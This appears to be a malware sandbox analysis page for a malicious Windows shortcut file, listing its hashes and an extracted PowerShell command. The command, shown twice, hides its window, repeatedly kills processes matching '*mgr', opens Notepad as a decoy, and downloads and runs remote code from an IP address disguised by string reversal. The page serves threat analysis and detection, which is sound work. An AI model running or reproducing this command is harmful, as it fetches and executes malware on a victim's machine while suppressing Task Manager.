Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
f1b64b730ab66ea4dc3cb35cd40ca370
Sha1
7a485d9c2f47b1778e3ccb86655748799d7de224
Sha256
8e50528cc74404f47377f47b359f650c14791dc04a93e61812a26178498a7637
Sha384
3f8ed576f157bb172c41e39484930d2e653707d30380e454d0f228549e5d8a8ea818b78c7802a6aeeec86728d51e01e0
Sha512
0945fabc013d3a8522622a4ebbd13f4f3c9b1c9f6882c2a1f3cb66ab34ab6540d097082c9d72855eccaeccebe4bd8d42c4b38a5f717222556359a75b105eea16
SSDeep
24:8DFoJCuesgUSgK0zgP8WYbCROAXWMrks2+/CWnvU7lEykHX44I0w4L4I0CWvfihv:84C6PBgxYuThrjv4lP63I9IGee
TLSH
AFB2CE1027F55309EBF28E3A68B5A3218277FC05E9229BDF5381154CA821111E87AF2F
Artefacts
Name
Value
LNK: Command Execution

powershell.exe -w h Start-Job{for(;;){ps *mgr|kill}};notepad .txt;iex(irm(-join '79.511.142.051//:ptth'[-1..-21]))

@kontroliryet - full.txt.lnk (23.53 KB)
No malware configuration were found at this point.
Artefacts
Name
Value Location
LNK: Command Execution

powershell.exe -w h Start-Job{for(;;){ps *mgr|kill}};notepad .txt;iex(irm(-join '79.511.142.051//:ptth'[-1..-21]))

Malicious

@kontroliryet - full.txt.lnk

You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙